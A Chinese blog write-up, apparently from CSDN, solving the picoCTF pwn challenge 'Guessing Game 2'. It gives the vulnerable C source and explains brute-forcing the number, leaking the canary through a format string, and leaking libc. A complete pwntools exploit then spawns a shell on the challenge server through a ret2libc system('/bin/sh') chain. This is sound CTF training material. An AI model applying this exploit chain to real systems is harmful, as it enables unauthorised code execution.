picoCTF pwn wp - Guessing Game 2

最新推荐文章于 2022-10-21 22:34:41 发布
最新推荐文章于 2022-10-21 22:34:41 发布
阅读量369 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/118028918
版权

在这里插入图片描述

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define BUFSIZE 512


long get_random() {
	return rand;
}

int get_version() {
	return 2;
}

int do_stuff() {
	long ans = (get_random() % 4096) + 1;
	int res = 0;
	
	printf("What number would you like to guess?\n");
	char guess[BUFSIZE];
	fgets(guess, BUFSIZE, stdin);
	
	long g = atol(guess);
	if (!g) {
		printf("That's not a valid number!\n");
	} else {
		if (g == ans) {
			printf("Congrats! You win! Your prize is this print statement!\n\n");
			res = 1;
		} else {
			printf("Nope!\n\n");
		}
	}
	return res;
}

void win() {
	char winner[BUFSIZE];
	printf("New winner!\nName? ");
	gets(winner);
	printf("Congrats: ");
	printf(winner);
	printf("\n\n");
}

int main(int argc, char **argv){
	setvbuf(stdout, NULL, _IONBF, 0);
	// Set the gid to the effective gid
	// this prevents /bin/sh from dropping the privileges
	gid_t gid = getegid();
	setresgid(gid, gid, gid);
	
	int res;
	
	printf("Welcome to my guessing game!\n");
	printf("Version: %x\n\n", get_version());
	
	while (1) {
		res = do_stuff();
		if (res) {
			win();
		}
	}
	
	return 0;
}

在这里插入图片描述

格式化漏洞, 开了canary, 不能直接溢出, 但是可以通过格式化漏洞泄露canary再溢出

预测同guessing game 1一样, rand函数种子是固定的, 每次生成的随机数是固定值, 调试拿到固定值
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

不过打远程就有问题了, 远程服务器的随机数虽然固定, 但不同于本地, 所以猜测错误
在这里插入图片描述

但是看源码发现随机数是有范围的, -4095~4096, 所以可以在1w次以内的尝试中找到随机数, 而且程序是无限循环, 随机数不重置, 可以爆破出远程服务器的随机数, 到达漏洞点

def bruteforce_num():
    for i in range(-4095, 4096):
        io.recvuntil("What number would you like to guess?\n")
        io.sendline(str(i))
        print(str(i))
        message = io.recv(4)
        # print(message[0], message[0] == ord('N'))
        if message[0] == ord('C'):
            print("guess number is: ", i)
            break

    return i

在这里插入图片描述

在这里插入图片描述

偏移量是6, buf到ebp的偏移是0x20C, 131个单位, canary到ebp的偏移是0xC, 3个单位, 所以printf格式字符串的第131 + 6 - 3 = 134个参数是泄露canary, 拿到canary就可以栈溢出, 不过后来发现是第135个位置处才是canary, 按理说计算上应该没有问题, 不过实际有出入, 可能什么地方没理解对…

在这里插入图片描述

在这里插入图片描述

有格式化漏洞的另一个作用是泄露libc函数的地址, 然后到libc库去查找对应的libc版本, 然后就可以找到system地址和"/bin/sh"字符串的地址, 构造payload调用system("/bin/sh")完成攻击

泄露puts函数的payload格式为

payload = cyclic(pad) + p32(canary) + cyclic(0xc) + p32(puts_plt) + p32(ret_addr) + p32(puts_got)

puts_plt是调用puts函数, puts_got作为puts的参数传入, 将puts函数地址打印出来, 然后返回到ret_addr处继续执行, 这里可以设置ret_addr为win()函数地址, 这样可以反复利用栈溢出漏洞

在这里插入图片描述
在这里插入图片描述

libc库搜索https://libc.nullbyte.cat/

在这里插入图片描述

在这里插入图片描述

这里需要注意第一个libc未必是正确的预测版本, 需要多个尝试, 最好从系统分类开始, 比如i386的Ubuntu系统, 有了偏移就可以直接调用libc下的system函数

from pwn import *
from pwnlib.util.cyclic import cyclic

context.log_level = "debug"
URL = "3.131.60.8"
PORT = 43578
sel = 1
io = ioess("./vuln-gg2") if sel == 0 else remote(URL, PORT)
pad = 0x200
elf = ELF("./vuln-gg2")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
win_addr = elf.functions['win'].address # 0x0804876E # elf.symbols['win']

def bruteforce_num():
    for i in range(-3984, 4096):
        io.recvuntil("What number would you like to guess?\n")
        io.sendline(str(i))
        print(str(i))
        message = io.recv(4)
        # print(message[0], message[0] == ord('N'))
        if message[0] == ord('C'):
            print("guess number is: ", i)
            break

    return i

# num = bruteforce_num()
# io.recvuntil("What number would you like to guess?\n")
# io.sendline(num)

# canary_leak = "Z" * 4 + "%x " * 30
# io.sendlineafter("Name? ", canary_leak)
# print(io.recv())

num = bruteforce_num()
io.sendlineafter("Name? ", "%135$p")
io.recvuntil("Congrats: ")
canary = int(io.recvline().decode().strip(),16)
print("leak canary = ", canary)
io.sendlineafter("What number would you like to guess?\n", str(num))

payload1 = cyclic(pad) + p32(canary) + cyclic(0xc) + p32(puts_plt) + p32(win_addr) + p32(puts_got)
io.sendlineafter("Name? ", payload1)
io.recvlines(2)
puts_addr = u32(io.recv(4))
log.success(hex(puts_addr))

sys_addr = puts_addr - 0x2a650
binsh_addr = puts_addr + 0x11442f

io.recvuntil("Name? ")
payload2 = cyclic(pad) + p32(canary) + cyclic(0xc) + p32(sys_addr) + p32(win_addr) + p32(binsh_addr)
io.sendline(payload2)
io.interactive()

在这里插入图片描述

fa1c4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
picoCTF:picoCTF挑战的解决方案
03-31
微微CTF 您好,我将尽可能详细地发布针对picoCTF问题的解决方案。 我建议您先尝试自己解决问题,如果遇到困难,可以按照我的详细解决方案进行操作!
buu reverse 5题 pwn简单nc 1题
空舟的博客
07-19 1315
1.新年快乐 查看有upx壳,脱壳 拉入32位ida if ( !strncmp((const char *)&v5, &v4, strlen(&v4)) ) result = puts("this is true flag!"); v5与v4比较,v4=HappyNewYear! flag{HappyNewYear!} 2.[BJDCTF 2nd]guessgame1 无壳,拉入64位ida F5伪代码,shilf+F12查看字符串,直接出来 BJD{S1mpl
2020网鼎杯朱雀组部分(13/15道题)wp
热门推荐
Y-Y-K的博客
05-18 1万+
2020网鼎杯朱雀组部分(13/15道题)wpMisc0x01 签到0x02 key0x03 九宫格0x04 小明的bb86Web0x01 nmap0x02 phpweb反序列化绕黑名单Reverse0x01 go0x02 treeCrypto0x01 simple0x02 RUA0x03 Guess_gamePwn0x01 魔法房间0x02 云盾 首先,感谢zsky,HotSpurzzZ和b0b0se3三位师傅的共同努力,才有了以下的题解,三位师傅的个人博客可在我博客的友链里看到 Misc 0x01 签到
攻防世界PWN-guess_num
Deeeelete的博客
11-16 645
题目:guess_num checksec查看详情 64位以及各种防护全开 运行一下逻辑,的确是一个猜数游戏 进64位IDA 反编译main函数 出源码 摘代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { FILE *v3; // rdi@1 __int64 v4; // rax@1 const char *v5; // rdi@1 __int64 result; // rax@7 __in
攻防世界 Pwn-guess
FUCKING12的博客
10-21 648
程序很奇怪,为什么要在这里面弄个stderr的指针,还没用,出于老油条的警觉,要仔细想想这里是否有兔子洞(doge),这里有个利用点,就是v4和v3只有0x10的距离,我们在比较的时候,就可以利用这个点,在v3输入0x10的垃圾数据后,后面就是stderr的地址,buf会和v4进行比较,那我们就可以一个字节一个字节的和stderr比较,如果对了,就执行后面的,没对,就重新输入,于是就可以爆破出stderr的地址。注意这个函数的 i 是在栈上的,我们可以通过输入v1来控制i的值,来达到栈溢出的目的,
picoCTF pwn wp - Guessing Game 1
fa1c4的blog
06-26 248
#include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/types.h> #include <sys/stat.h> #define BUFSIZE 100 long increment(long in) { return in + 1; } long get_random() { return rand() % BUFSIZE; } int d
picoCTF pwn wp - Stonks
fa1c4的blog
06-25 426
给了源码 #include <stdlib.h> #include <stdio.h> #include <string.h> #include <time.h> #define FLAG_BUFFER 128 #define MAX_SYM_LEN 4 typedef struct Stonks { int shares; char symbol[MAX_SYM_LEN + 1]; struct Stonks *next; } Stonk; ty
ADworld pwn wp - dice_game
fa1c4的blog
06-25 143
因为是伪随机数, 所以可以覆盖seed的值, 然后得到伪随机数序列, 命中50次通关. from pwn import * from ctypes import * libc = cdll.LoadLibrary("libc.so.6") URL = "111.200.241.244" PORT = 50956 sel = 1 io = process("./dice_game") if sel == 0 else remote(URL, PORT) payload = cyclic(0x40...
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
picoCTF-Platform-2:picoCTF 2014 的通用版本,可轻松适应举办 CTF 或编程比赛
06-22
picoCTF-平台2 picoCTF Platform 2 是 picoCTF 运行的基础设施。 该平台旨在轻松适应其他 CTF 或编程比赛。 picoCTF 平台 2 以 Ubuntu 14.04 LTS 为目标,但应该适用于任何“标准”Linux 发行版。 它甚至可能适用于 Windows。 必须安装MongoDB; 所有默认配置都应该有效。 配置 下载 VirtualBox(最简单,但其他人可以工作) 下载 Vagrant (vagrantup.com) 在 repo 中vagrant up 等待 20 分钟 vagrant ssh连接到虚拟机 运行devploy部署站点的开发版本 转到主机上的端口 8080 请记住始终使用 127.0.0.1:8080 而不是 localhost:8080 注:比赛有两种模式:比赛主动和比赛不主动。 在非活动模式下,没有问题,只有注
xdctf-pwn200-附件资源
03-02
xdctf-pwn200-附件资源
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
pwntools中fmtstr的使用
fa1c4的blog
02-01 3385
pwntools提供了pwnlib.fmtstr的格式字符串漏洞利用的工具, 熟悉该工具的使用显然是有益的 可以查看源码 该模块中主要定义了一个类FmtStr和一个函数fmtstr_payload class FmtStr(object): def __init__(self, execute_fmt, offset=None, padlen=0, numbwritten=0): self.execute_fmt = execute_fmt self.offset
[Windows] CVE-2011-2005 Afd.sys 本地提权漏洞复现
fa1c4的blog
01-26 3179
前言 这是一个微软在2011.10发布的补丁中提到的系统辅助驱动程序Afd.sys存在的本地提权漏洞, 影响到Windows XP, 和Windows Server 2003系统. 漏洞成因是Microsoft Windows Ancillary Function Driver(afd.sys)驱动程序没有完善检测用户提交的数据, 攻击者可以利用该漏洞执行任意代码. 漏洞分析 漏洞利用 总结 ...
Ubuntu16.04 pip安装pwntools出错
fa1c4的blog
02-23 3009
具体出错过程 Ubuntu16.04装pip, 然后用pip装pwntools会提示pip版本过低, 按给的命令更新之后pip就崩了 解决 先卸载pip https://blog.csdn.net/qq_33976344/article/details/113991528 然后下载文件进行安装 curl "https://bootstrap.pypa.io/get-pip.py" -o "get-pip.py" python3 get-pip.py python2 get-pip.py # 提示 ERR
kali安装checksec
fa1c4的blog
01-26 2958
git clone https://github.com/slimm609/checksec.sh.git cd checksec.sh sudo ln -s checksec /usr/local/bin/checksec 如果已存在checksec,用 sudo ln -sf checksec /usr/local/bin/checksec
BUUCTF pwn wp 81 - 85
fa1c4的blog
01-08 2860
wdb_2018_2nd_easyfmt int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char buf[100]; // [esp+8h] [ebp-70h] BYREF unsigned int v4; // [esp+6Ch] [ebp-Ch] v4 = __readgsdword(0x14u); setbuf(stdin, 0); setbuf(stdout, 0);
攻防世界pwn-forgot
最新发布
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值